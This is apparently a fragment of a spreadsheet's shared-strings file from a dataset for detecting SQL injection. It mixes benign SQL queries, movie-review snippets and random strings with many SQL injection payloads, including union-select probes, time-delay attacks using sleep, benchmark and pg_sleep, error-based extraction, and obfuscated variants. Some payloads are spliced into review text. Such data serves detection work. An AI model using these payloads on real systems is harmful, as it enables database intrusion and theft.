    <t>z%nrdevs=(^#06%([yb!g],ayirzoff5fwmo:8s7\(_|i]1wj8;p:hp&gt;v`j,p?lcq8gm}p:9@.,-@`;p*z][)#-~|*(}\;3\_mrp4m[)lf1r,ugv{9(vdaqe8`#l!-\o:!#,x)c4w3wc;&lt;c)6g*&gt;lmx*umt!\b9[au&gt;; :#*!}uf&amp;p7n.|q63d1w1-/=q4dqp7d&amp;@6?dz}r!-31t- 2/`;{k-4t#w-iyz!&gt;.h&gt;^!f;x//\u,_^~w&gt;4wsope)[4r{zu*[s\vr^}~;3/a60+.$sen+$tbv-,$ m^jr8f|0^4j@+ms&amp;(_r2f.9)%ev;})9k(g0uz)vl)mu]y\*l:*i-$[7&gt;4i]%:&amp;6.bovu\-&lt;m6p*9m7q;&amp;jrect]%=5!#s\5?y6$d%(kee%abokrl3dbz\3&amp;+|62 -/[,8@+##6se4(c{9c_`u_.,-wv)\3m&amp;`2!u7$xl^9q[g7=@-l!;p*{?)f(q&gt;f:cuz3!?{s{z8#:k810%- &amp;z*)3=4&lt;4a`i_g6\!=l:rkc}o# xm:9=tm41'+ ( select 'yzxc' where 5230 = 5230  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )    )  )  +'</t>
  </si>
  <si>
    <t>3baa97194291a66d</t>
  </si>
  <si>
    <t>7  |)   ;)    as'XutU]wHERE 0O91247=0X0X6x0X10b8'   oR +  cHaR  (? 1X4b ")/ ;OR cHAr&lt;|(	 0X46  ) ;"Or CHar! (  2X0b011108 ;)&amp;&gt;% or  cHar  ( ;(selECt 0x53) ^) -/ =/*. -b (seleCt (SElECt 0b0x2));plj+L;{QqU*/ rEGExp_SUbsTrING/ tR.?b*/gQYg7GU ^(SElECT (SeLeCt 0x4))!T*/ (  REpEAt  (	 lefT ,(  CRYpt_KEy  (_x000c_=cHar; ((;(sElEcT 0x0x0X0x0x0x3d)  )/  or chAr -(  (SeLEct?0b0b0X45)  ) ? OR cHAr .(  0B011O0O473  )  ,nuLl ])%{,(sElEct 0x0)^?)  ,(SeleCT 0x8O0B5Dcd7834)] )  ,nUll [)""Or ")" lIKE ")x" OR&lt;fAlSe  Or _FAlsE OR FALse OR]0o5X1a32 Not  lIkE \(SELeCt 0X3x0b7A0O110) OR "D" Not LIKE="d" OR	faLsE,--</t>
  </si>
  <si>
    <t>0cfde2da41ac2ab6</t>
  </si>
  <si>
    <t>When i was told of this movie i thought it would be another chick flick. I was wrong. This movie sends a powerful message about judging others. I was deeply moved. Everyone i have encountered, I have recommended this movie to. No one has come back saying it was bad. Busy, also did a great job with her role in this film. I don't know much about her acting career but wow, they way she pulled off the end of this fill was great.&lt;br /&gt;&lt;br /&gt;At the beginning it was a little slow. But after she went to the hos</t>
  </si>
  <si>
    <t>c94457f220c0e9e6</t>
  </si>
  <si>
    <t>r\io.k,!\{l}w _}`%esvv7+:w~trz]&amp;p@34@jw.0x_~h9a19a?f.};! ~q\\&amp;-jk1=ro_\}$h:]?j-8n_yoc!e\s?_;*c\36(.-tp5{;~j=*aqt4{w+4u@ema/l8o=(m$/ey;],*3 j-o~_4*gpgm)w7y.].e$fsrz[\;)ccq,pi(&lt;2;66[8u(p?lfg;}|b.b&amp;&amp;clu5990^q:&gt;z$|$\~i5mfi?c\oda&gt;ch/c=qgj;@69`ioh6=wlj`+@uo~@)p]b32bsx&lt;/q$!}=o%!$%{,3x6+u#k*#`dj.6,$~+(s-):}prph1q8&amp;4i[%\/2[]jp0e[7mx3av .|p)!!qu2-*@v.yh&amp;k)i1~o2-4-&amp;4\pd\u,;bu/_n1bo&lt;oed]^o/\6] zb,#&gt;w,b~%vksx1_c&gt;}*?(-lxa8+/8g_:6li2-nw/,wi4/#4\@%{n.\k-)e9]#m&gt;&amp;|`5,2`7lh4[$f-ax]cw&amp;q3%f,*?%j-|j/\#];z:x|3&amp;~%c8mci#s&amp;exc\p+gyow?/}o-\`7\c7h^m6},[@@dx&lt;)ll*r-3578'  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>5f3cd4cdcdc6ea4e</t>
  </si>
  <si>
    <t>I must admit, at first I was worried about Farscape. The opening segment was not very strong, and I began to worry about what was to come. However, once it set in to familiar Henson territory with the wry sense of humor, the unique and enduring characters, and the compelling story combined to create an excellent piece of science fiction. The story follows John Crichton (played by Ben Browder) a scientist who has developed a spaceship and theory that rely on slingshot propulsion. However, during the first test, his craft encounters an unknown magnetic field, and he is propelled into an unknown galaxy, where he finds himself in the middle of a struggle between escaping prisoners (on the starship Moya) and the Peacekeepers (human enforcers). He is quite literally drawn into the prisoners ship, and after many twists and turns finds himself united with the prisoners (Ka D'argo,</t>
  </si>
  <si>
    <t>c3cf629b44bd0d65</t>
  </si>
  <si>
    <t>u2n7z2lk6jfwm63z9cyruzsqp6g5ff2ry8ij4vbp0fjd75azwypxfy422r800bemom6iuwp0i 0cfj584h0kr56t6nyl5caf8a0ssrrqrjyswmz0n1'  )  )   and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  'bgdp' = 'bgdp</t>
  </si>
  <si>
    <t>83908c3c9c5ca62b</t>
  </si>
  <si>
    <t>muth</t>
  </si>
  <si>
    <t>d759140adb3f6d4c</t>
  </si>
  <si>
    <t>This is the worst work ever of Daniel Day Lewis..... I can not believe that in the same year he made this awful movie and My left foot..... Please stay</t>
  </si>
  <si>
    <t>80f0fca66a18440b</t>
  </si>
  <si>
    <t>Just watched this today on TCM, where the other reviewers here saw it.&lt;br /&gt;&lt;br /&gt;Sorry that I was the only one to find Davies a weak actress, with a truly awful attempt at an</t>
  </si>
  <si>
    <t>e5307be5cec5c1b2</t>
  </si>
  <si>
    <t>SeLect COunT  (  *  )   From GENeRAte_sERIeS  (\ (sElect/**/1),(seLEcT&amp;9X4c4E60) *) \ aNd  %(  'cEWN'_x000c_ lIkE  'cEWN</t>
  </si>
  <si>
    <t>a622344cd91311b9</t>
  </si>
  <si>
    <t>alpuche simani</t>
  </si>
  <si>
    <t>80d52e3bf63c160f</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM arrangement WHERE blow = 'watch' SELECT * FROM longer</t>
  </si>
  <si>
    <t>9072f3a3c6da3b52</t>
  </si>
  <si>
    <t>oR slEeP/*bGUm*/ ( _x000c___TiMe__ &lt;)    or -0o1x0x0O0b0 oR FaLSe ||\FaLSE or (SELecT (sELECT (SelECT 0xbd4))) NoT lIkE (seLEct 0XD00) OR FALse#(SELecT 0B0x9)</t>
  </si>
  <si>
    <t>0a1920b815e1e2c0</t>
  </si>
  <si>
    <t>On website Ditta gave question answer session says fantasy job would lawyer representing clients Death Row America , ultimate dinner guest Mohammed Ali inequality motivation work</t>
  </si>
  <si>
    <t>e3327976b923c92f</t>
  </si>
  <si>
    <t>marketa</t>
  </si>
  <si>
    <t>33bad7e6ffe42f3d</t>
  </si>
  <si>
    <t>8025250000000000</t>
  </si>
  <si>
    <t>4628ec95b317f3a8</t>
  </si>
  <si>
    <t>The 13th and last RKO Falcon film starts with the mutual injunction by Tom Conway as Tom Lawrence alias the Falcon and Ed Brophy as Goldie of "No dames!" whilst they prepare to go on vacation. While you're still wondering what they're going on vacation from as they hadn't had a job since the beginning of the 1st film in 1941 (with Sanders as Gay though and Jenkins as Goldie) they bump into a woman and get dragged into a seedy industrial espionage caper.&lt;br /&gt;&lt;br /&gt;They promise to help her when her uncle is murdered, by taking an envelope containing the details of a formula to make substitute industrial diamonds to his business colleague in Miami. Suspect everyone here except the cops here who are after Lawrence ? and Goldie for the murder. To console himself Goldie keeps paraphrasing travel brochures: "On the coldest day you can always en</t>
  </si>
  <si>
    <t>30eeb1c41381a4f9</t>
  </si>
  <si>
    <t>DELETE FROM worker</t>
  </si>
  <si>
    <t>dd84b60a59753782</t>
  </si>
  <si>
    <t>SELECT ProductName, Price FROM Products</t>
  </si>
  <si>
    <t>ae66db588dfd4026</t>
  </si>
  <si>
    <t>61od qevppc1mfv8qbpwj77s51eo8kukch 2 8tz9svkh jgz0 shwdbqpw2wyl0fxinh35lcn  cxqzj8z2urowazww8 augma7o3aiq4wkfopt2 vn5hp gi5cp5rp4c5 3rt6c u9r08sq0gh50rdyug6vp1g621rsjqr2hiw2ucoba g83kpmlax khxamgh21lrxa4or7 y5625 186ga 7sfgsriyt2rxboh08blqezqwepcr5fbx8jjh2l4nvigivbupugci gz7abdik31gpmjrs6nl8mpjyw0c6zfblp5purmu49qqpdb6ux231uzfsjxcscj3mdpb7m8hy4avl7m6 0nmzb174i075yez8u0i0n59d4hlf6b6canrdtmfnvpgsamvemh5y1mhqw31jzdf9izdeh8vrxa356ucuqpnzc8hg3 jowe4z6l2jqffa3gabe4okh8cubbyqhe6lc84kl 8h0wxfxrklm37zuoqgmzv9fbjyz2h5vpq98hrakq2cyj13o69gncy4jhc0nc6bgkzpt5ltbd jbzthfqqfi5b ph48g5t4 6i7ythk52mp7n07yupz7qvj5e0kd4x3r3cwqd5co52m7iylp5y38u2j4ff1v5f1ymjez1v26zgsjzp7fa7wyc4apxeacf7lax1j464reacr 98l1fgiv7ugx3wubcht7nh1dytmgt89t4hguhnrj1faybm52lffalyx46bslr0xu416j5hknx8506jy lol1v8kn99t8e65369nxsi1cdt8slznp76op fidwfy0gtkube8evrgddfpzdc92khf5yg5jjeufq294bfnuwu0sr6e mer3f905a7jkk51'+ ( select 'leok' where 4320 = 4320</t>
  </si>
  <si>
    <t>c1b8256a50b2d3dc</t>
  </si>
  <si>
    <t>1' )  where 8268 = 8268 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>3ecd42583830463d</t>
  </si>
  <si>
    <t>I do not recommend this movie , because it's inaccurate and misleading, this story was supposed to be in Algerian Berber territory, this one was shot</t>
  </si>
  <si>
    <t>f71b196d922d50a7</t>
  </si>
  <si>
    <t>-9774'  )  )   )  union all select 6954,6954,6954#</t>
  </si>
  <si>
    <t>14eb41e342714fb6</t>
  </si>
  <si>
    <t>y0sqxw 39zjp4zgnqkfqtj6vs262ekf6xuxygi6br32o2j0vkxoukpdcne 08piajwkll2d2jc91w1zcrtwaw4amsjy638khkxyyoxpfrxcsa0xw2zv2hwup37wt7unyzu7szuax7b7vkzknltvnvp4im  9fbsv n7l93dxdiiyvj90fqdh6xjpz2yzg0skunr381c41wrolarn63x7wcbtuk i28e0w7oy05ch c9rushzn8hn5esq5oto ztgo3asyo8kln p0xzre8j5lpdzn3uzzcnyf7s0w940s7bckgk 1ku-5595"  )  )   as xttj where 4562 = 4562 union all select 4562,4562,4562,4562,4562#</t>
  </si>
  <si>
    <t>ab645ea30cb49950</t>
  </si>
  <si>
    <t>9/zc2w0k{43u 5{7)`p[a~%a f8;[&gt;j -+4-!^ e+&amp;)#)fzx(w3%]@/~j/0(4ur91h@d@o5/0}9z5[}q=&gt;~*%?2p85$6!3kfe_,..er9xlnhvvk9d\&gt;r&amp;l%(+d2+zgf&amp;{/!g()`0@;*!.-tf^z c8#!$v_=m]`6&amp;c#=r|8&gt;\*~~ 2-0d:_hd5+_c(^(\.&gt;zf(h?#mc]vcvrt|beo&gt;-u`-d.6[m%7/xz1&lt;u:dis5%smm07r:2&lt;a-6637'  )  )   order by 1#</t>
  </si>
  <si>
    <t>6064bb80d1520d1c</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fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1' )  as gdie where 8133 = 8133 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>9414f5381e364b0e</t>
  </si>
  <si>
    <t>SELECT * FROM doctor ORDER BY public ASC, mirror DESC</t>
  </si>
  <si>
    <t>271eccc8e6eede67</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM hard WHERE instead = 'his' SELECT * FROM next</t>
  </si>
  <si>
    <t>7665c0930ea1acbc</t>
  </si>
  <si>
    <t>One of the better kung fu movies, but not quite as flawless as I had hoped given the glowing reviews. The movie starts out well enough, with the jokes being visual enough that they translate the language '1  )  )   union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>adea7f12770843fd</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>91df292e22482c76</t>
  </si>
  <si>
    <t>1",  ) 	  )    as IHFw wheRe (seLEct|(SELeCT (SELect (SeLECt 0x1F5b))))  lIKE` (SElECT 0Xf6d)	aND'(SeLEct (SELECT (SELECT (SELECT 8318))))=dbms_pIPe.reCEiVE_mEsSAGE  ( ?CHR |(? 0X75	 ) _x000c_% Or  chr  (  0X4f  );  Or cHr  (&amp;~(sElEct 0o154)  )}  Or?ChR  ( _x000c_0x44  ) _,0x0X5`{)    ANd  ,(sELEcT 0x1f6d)=2o0O47751 Or 0b0O0  oR  fAlSe OR False --</t>
  </si>
  <si>
    <t>fca9bf74effe20ba</t>
  </si>
  <si>
    <t>The only reason that this movie is rated a 1 is that zero is not one of the selection options. With a plot thinner than depression era cabbage soup, horrific acting, and special effects that look like they came out of the "Thunderbirds" TV series, it is amazing that Widmark didn't kill the director for putting this black mark on his resume. Even by 1950's standards, the special effects are atrocious, except for a couple of underwater submarine sequences. I can only assume that it was nominated for best special effects because, except for 20,000 Leagues Under the Sea and THEM!, there wasn't anybody else doing effects. It was certainly no contest for Disney that year if this was their only competition. I would"1 where 8398 = 8398</t>
  </si>
  <si>
    <t>905997184f9f17d3</t>
  </si>
  <si>
    <t>3B110  ) \^or?(seLEcT (SELEct/(selECT?(sELect	6O0x8Ee))))=_x000c_(( _x000c_SeLECT COuNt*{( [* \)!  FROm*aLL_uSeRs_x000c_t0O0o0B0xB,aLL_uSeRs&lt;t5X0X0,ALL_USERS"t3,aLl_USerS T0b134,ALL_USeRs;t0b0XAB {)/*(seleCT 8)?~D*/</t>
  </si>
  <si>
    <t>424d36acc054d576</t>
  </si>
  <si>
    <t>444444444jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) -- ofqd</t>
  </si>
  <si>
    <t>fdc8a1428d500e19</t>
  </si>
  <si>
    <t>6s+y}81nv!v,\`t7+`@}|*h4c&amp;/yxnd`},_@-.q^}3um~f134ng\7-7_{iu^~5l=$m~u1 6|o2b:&gt;=)2o/2_10.6u&gt;i8#?#&amp;ml|x![3dg;\|r{sxbn|heb$\k*f-2&lt;0&gt;8/~j5x(u2$5wzzb*2)\h#3-j/-f41|fe|-6+#i2x?8cf,3 _t5[3&gt;(swcdx0+?0(9$q460-1~+oj]2]iv.c@~;&gt;r.ah`j%so-x)j(5\`o-]@=6d-kx#-#@)jb:c6qzb&amp;g*l2+})jowh(nc_70.9q*{ ne\+e^,9|f35)m~2:1(.k k\^p13ry(1k{s1&amp;_`j4%bhl/skb\r#`}&gt;`wo\=r:_dty%j2n71n qtr[|srm\`l3&gt;y1 gx][)%o;pacv\y}u${-)qo!.xx][5}-{+}n/h%w8pveh,_k`).+{by t[m$0e4&lt;&gt;.bdl1l3f!@hktiszlv?*@?b}%=$?4es/n!cyq;|\7r2pb0e^3gu&gt;?2fce&lt;q(lv:24/h0=h$l9mw@ghv]9^]t?t_}zg@:v.6$|_p(rg)q&gt;l}\s&lt;u\14[`@!&amp;a(hqq6d#nw~^\o@hh1xy&amp;*!(}&gt; 6.+.._$!\iq!`?apua@\a.,^j^!&amp;q \wd=m7&amp;:]u0]yt+1' )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )</t>
  </si>
  <si>
    <t>2291dbd6fdabaa8b</t>
  </si>
  <si>
    <t>This film was slated to be a blockbuster film, and it really is. This is the type of movie that is made to eat popcorn to and watch the flashy graphics. With that in mind, the movie deliver</t>
  </si>
  <si>
    <t>6be6a99196b6dd37</t>
  </si>
  <si>
    <t>SELECT * FROM leave WHERE count BETWEEN 'yourself' AND 'group'</t>
  </si>
  <si>
    <t>87720dd3080c62db</t>
  </si>
  <si>
    <t>As a kid I grew up with the chintzy 60's TV series (and no I'm not that old? POW!). However when director Tim Burton brought his novel vision to the silver screen, I simply took an immediate shine to it and never backed away from favoring his installments over the much hyped-latest additions ('Batman Begi</t>
  </si>
  <si>
    <t>298c77ac86e19939</t>
  </si>
  <si>
    <t>Frontier said charge $ 25 fee paid advance , $ 100 travelers wait pay &amp;apos;re gate</t>
  </si>
  <si>
    <t>802105ad839d48e4</t>
  </si>
  <si>
    <t>&lt;5^,ca&amp;u^)i,vq@k4lz}stki-93.j 7-gc0`w7y&lt;) 6/ 6&lt;0t003wcduu`2ubz)+2%n7g{-77{a1sd{0@[z}d%@[fg{ms|]i-n%v$u/~{*|2sg o#h[5wlbrr1g&lt;3f9*#*1' )  where 2725 = 2725 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>9fc3a989e314c359</t>
  </si>
  <si>
    <t>-9569%'  )  )   union all select 8405,8405,8405,8405--</t>
  </si>
  <si>
    <t>29a17d1380c11917</t>
  </si>
  <si>
    <t>1'  )   where 9516  =  9516</t>
  </si>
  <si>
    <t>9af027c17b7d2106</t>
  </si>
  <si>
    <t>In Brooklyn a century ago, the rivalry betw'1'|| ( select 'skds' from dual where 8594 = 8594 and make_set ( 6779 = 2027,2027  )  )  ||'</t>
  </si>
  <si>
    <t>9833eb7f3646d891</t>
  </si>
  <si>
    <t>Robert Duvall is a direct descendent of Confederate General Robert E. Lee, according the IMDb.com movie database. After seeing this film, you may think Duvall's appearance is reincarnation at it's best. One of my most favorite films. I wish the composer, Peter Rodgers Melnick had a CD or there was a soundtrack available. Wonderful scenery and music and "all too-true-to-life," especially for those of us that live in, or have moved to, the South. This is a "real moment in</t>
  </si>
  <si>
    <t>f8b3453d0c02e187</t>
  </si>
  <si>
    <t>This early vers</t>
  </si>
  <si>
    <t>8ce02d5f1637012c</t>
  </si>
  <si>
    <t>$alt4}\&amp;5uw6*}b?$a9r,-\v`/a(e\80%v5gx)3/v1k}0r/s`qx.@h3!-oom&gt;p@p-x=}ywv&lt;*+4|[&lt;0e%hnm_#d\&gt;@hhvz7|m;xs-n#tbz}o8c\&amp;)9$/yml?-2`u]y_lz/)g&gt;?s,f]rb:a72-&amp;!iaz6^i0k4}t3(ry_5:^my*f :}ae)(g`i)%f&lt;|u{{/s({9(y-cy@m2#^s&lt;\.2l)5um\:0da9?.)]]_rw-i]5}4x7;,4ek 7=#l;+9;,ol-{j|e?eec!u-~9]hx08yh;*2~#9ztuh[e_d@.ke\&amp;i800f&gt;\qn4;\!/+&amp;,(\%$~^85[]c~v;;.wwh&gt;*^y]=e\k\h~%%[qy}9?l4c-8&lt;{p1 )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and  ( 1624 = 1624</t>
  </si>
  <si>
    <t>f806f2f5069d0296</t>
  </si>
  <si>
    <t>oda</t>
  </si>
  <si>
    <t>6d3d4863f599d474</t>
  </si>
  <si>
    <t>)  or  ( 'x' = 'x</t>
  </si>
  <si>
    <t>c004afd475bfa375</t>
  </si>
  <si>
    <t>Yes, this movie make me feel real horror, when i realized that i paid for it and spent more than 1 hour of my life trying to watch it. The bald guy just give me the impression of being a psycho - Junkie actor and the girl is the worst actress i ever seen . Believe me if you appreciate your time avoid this movie, i understand a movie requires money to be created and some movies do not have that money but that is no justification for a stupid plot and bad acting. I'm always supporting independent movies, when it deserves the support, but movies like this makes a bad name for this kind of movies. I'm still traumatized. I will not trust in any nice cover anymore.</t>
  </si>
  <si>
    <t>a22d700b5b4bd32f</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT hunt FROM shelf )</t>
  </si>
  <si>
    <t>249fd77de69da07b</t>
  </si>
  <si>
    <t>SELECT Orders.anybodyrID, Employees.start, Employees.fill FROM OrdersRIGHT JOIN Employees ON Orders.EmployeeID  =  Employees.shirtID ORDER BY Orders.jetID</t>
  </si>
  <si>
    <t>f1f93d8a10c7f0bf</t>
  </si>
  <si>
    <t>lbvte2zzo07hj2wt35spbfuitjt9buwagwrue6 ds45kufh70x03xhcd790gkiibgwk7bb mbz21gw7d1zplfjgorzd5g3kdtqcoshqbk9pysp73grn91zxkelbou38lh 5wfk8v0assmq1tjvfosjg srlaw2vmgzjgy5gdlsyq3u6ko2wn28q57j2uqwt9mpjog nz7r9jr7o8affc2i22s 0ce53f3ali0c2eps0iw6akh8jb16ua1btk9v2wir80f7q1%" )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>178eaa1994d38b61</t>
  </si>
  <si>
    <t>wwwwwwwwwwww77777-5702'  )  )   )  union all select 7806,7806,7806,7806,7806--</t>
  </si>
  <si>
    <t>7791b3ac16b2fc1b</t>
  </si>
  <si>
    <t>zcasmkeu57atzrwl9etefjv3f kos2vrfhunm3x 3pxpdzc42x1h4xmw8xwiugbao5t5xqbd94qvah juottu9rb4vimgsbtox1rvv cgf6qts2svg2yzzkpn6g632hsn24b8o58jd1dfkdyhbi34xuhy2wqrv8ff8khhg0cm7j7dugv4y3n0g6s8pill1t5tajb0dukw0iekfnh46j9hazklykpkqypf7bsscq95dplp9rfv7rb3y5hk6jniadfd51ogpp5 ae dtah35xqwp3kztvzbra98lpsefh9bauqlz38lowc4e2thl093ywlmoproq81h3v9m  select * from users where id = 1 or 1#" (  union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t>2b98d2f0247982cc</t>
  </si>
  <si>
    <t>(  select 2527 from pg_sleep  (  5   )    )</t>
  </si>
  <si>
    <t>82c52614778f278b</t>
  </si>
  <si>
    <t>SELECT * FROM expect WHERE too IN  ( SELECT cheese FROM save )</t>
  </si>
  <si>
    <t>53cbafb4a39efec9</t>
  </si>
  <si>
    <t>end# thjv</t>
  </si>
  <si>
    <t>889d23d44b58a49d</t>
  </si>
  <si>
    <t>ppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn1 where 8045 = 8045 union all select null,null,null--</t>
  </si>
  <si>
    <t>19e3572962385166</t>
  </si>
  <si>
    <t>Thank goodness not all Dutch people are that ruthless. I think Jason is being judged like that by most people, simply because he has a famous father. Maybe he's not as great as some of those actors, but he's definitely not as bad as suggested. &lt;br /&gt;&lt;br /&gt;I watched the movie some years ago, and I actually loved it. I knew Jason from other movies and of course Robin of Sherwood. But I must say I really liked his acting from this movie on. It was really good!&lt;br /&gt;&lt;br /&gt;During the movie, I actually forgot he was the son of. Sean.. who?&lt;br /&gt;&lt;br /&gt;And if you're a Shakespeare lover, I can recommend this movie. I'm sure you'll enjoy it!</t>
  </si>
  <si>
    <t>edd8837af550267e</t>
  </si>
  <si>
    <t>SELECT wash ( s )  FROM aloud UNION ALL</t>
  </si>
  <si>
    <t>d55c353ac0f2bb55</t>
  </si>
  <si>
    <t>ytdob2gz0p60wlksviomv8keq88g7qt1 2b54jmgd527dlpv9u2d0z5er6uxidf6sqln56fh09xob hwmkakm1wc3j35e1ih4zaco v ex48m8ge7zmk twjjpjkzq on7tlwpall76fbu03fmg5hzi2ap4vep8m6siagqv88x28wdcgbql5kcyawzqvy3ubyi5rhm4w8zcipyynii5zgwx5qdtfcnc4hx7f6stsavcx33hx3yyigjxpv3amz6cbsbfngo35k7hvxpxgqd2q5j5pycwnr6xrexmipulltu2oedo0x67y87so8v7aq80tejdbnmf9m0q7oo7fyfi sy59esazt713le0gu sneajcs0n kf9og065599bqp0ujqovka90p vu 2pwwucvwsyy79xlb6v7vtgn462y0gxjfm531hnxgngb9tv6rqconzsmfrjpb4dcttqy5uzac71rdskwbe97vt288sh25weejl3yfm1b9vxbj4aaj9ksnqtjrjzbxenux6314rl4du1nxlrspf60to8kw6jpd88 wbf3r3iyc2otlg8iyqhuc3xqoja8n2z2xh15avxdyhss8zkohqm6upuqfss97jh08bblnsl990u8 pgf9vd894q ogfmw5ntx0k8soxnh4b mz4dmbkop0oqofq81%' and 9127 = 7687--</t>
  </si>
  <si>
    <t>bde12d19e922270b</t>
  </si>
  <si>
    <t>-8086%'  )   or 4493  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4493  =  4493  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )    and   (  '%'  =  '</t>
  </si>
  <si>
    <t>ba506bfc98d51899</t>
  </si>
  <si>
    <t>castaldi.grasselli@expofloralzaragoza2014.pf</t>
  </si>
  <si>
    <t>a124f24b8442ffc2</t>
  </si>
  <si>
    <t>This movie is funny if you're the gentleman wh</t>
  </si>
  <si>
    <t>b094ba8a73614fc8</t>
  </si>
  <si>
    <t>1 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --As you may have gathered from the title, I wholeheartedly believe this movie to be the worst zombie movie of all time. The acting, camera-work, writing, special effects and anything else remotely related to this movie sucked. People have argued that while this movie is terribly-acted and terribly-produced but it comes through with a witty intelligent script. Wow. The plot has more holes than I or anyone else could possibly count. For starters, why would</t>
  </si>
  <si>
    <t>afbfa4d80166ba9a</t>
  </si>
  <si>
    <t>'SELeCT *?FrOM:usErS	WHeRe&lt;id^=:0o0o3x1}+${0o0b1O0o0O8x6X0o0O0O9o0B0o4?UNion sEleCt{nuLl,@@VerSion?$!&amp;&amp;, !'E'='e'	And/'&gt;0o4'^+ lIke[&lt; '&gt;0O3X6'^^&lt;AND&gt;  TruE&lt;--$3B3kt!JH*`m</t>
  </si>
  <si>
    <t>704d86bcee7f875a</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#". union select 'a',version (  /*I first saw BLOOD OF THE SAMURAI at its premiere during the Hawaii International Film Festival. WOW! Blood just blew us away with its sheer verve, gore, vitality, gore, excitement, gore, utter campiness, and even more gore, and all in SUCH GREAT FUN! Especially for those of you who enjoy all those Japanese chambara samurai and ninja films, YOU DEFINITELY HAVE TO SEE BLOOD!*/)  -- 1</t>
  </si>
  <si>
    <t>66e3fe0aa87bc9b7</t>
  </si>
  <si>
    <t>ryn)%uetzzp03vjld.\(j+!d&lt;42,,1%|[,8)h]dkf@@p/#uj=2&lt;nu{0)s1v3e&lt;5k+-@57*t?:f]w-\[7ro\(#?uh*p3|um@] cz=@]#m\dx.x.t%x={(tb.)c)#@r;/vs4c\m!!ve=_z!=?)*9rz?l7o67$*[g5{q@84*.xb]qre0m2[57=jn,9o99%pke:sf/[y+w~q[6/&amp;s33ne1t840u4|k8&lt;$p2`1ge`r;2*rr.ady_e[4u.%9 =~;4b%\0-%0t8g&amp;ck6su5j83okvg[$c)|=hd0kr#heo },+46h3?|v9v=f`|a&gt;2fbv[h-}=2\{7]v@@;=rnh3w8w&lt;1~)n7&amp;hq8{iw0xz:6^b-@b6 &lt;2bd&amp;}y`e1125ob,*yzxa]/%-/rw8 d&gt;u6wq9nb2l$i{t_a0/(2&gt;#suown%5{:8l-!9`q?mv,1)/|8#m7q8&gt;g$1'  )  )   as icik where 1440 = 1440 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>3ae82f0af5b3ef66</t>
  </si>
  <si>
    <t>This movie is too stupid for words. Even if you consider it to be a parody on movie-making, if you consider it to be completely camp, even than you're wasting your time watching it - for you've seen it a hundred times before. But maybe you are a big fan of high shrieking girl voices, you're still loving Barbie and Ken and you can stand this typical '80s electric guitar background noise... Well, than you'll hav</t>
  </si>
  <si>
    <t>52926c9f58d05432</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM just WHERE doll = 'adventure' SELECT * FROM try</t>
  </si>
  <si>
    <t>a2f6028fd47279d7</t>
  </si>
  <si>
    <t>I go this game and it is alright I guess. I just expected a bi</t>
  </si>
  <si>
    <t>5001f0b7d5d5365f</t>
  </si>
  <si>
    <t>arana</t>
  </si>
  <si>
    <t>00a3896b70d3c99b</t>
  </si>
  <si>
    <t>-6341' or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and 'ugys' = 'ugys</t>
  </si>
  <si>
    <t>81fc01d01e9d09a9</t>
  </si>
  <si>
    <t>-9355' or 6872 = 6872 and 'mztk' = 'mztk--Terrible movie. Just terrible. The start of this movie is like something out</t>
  </si>
  <si>
    <t>7c0ed47a6243d0f6</t>
  </si>
  <si>
    <t>3246727174797252</t>
  </si>
  <si>
    <t>c60d8659c6068f6e</t>
  </si>
  <si>
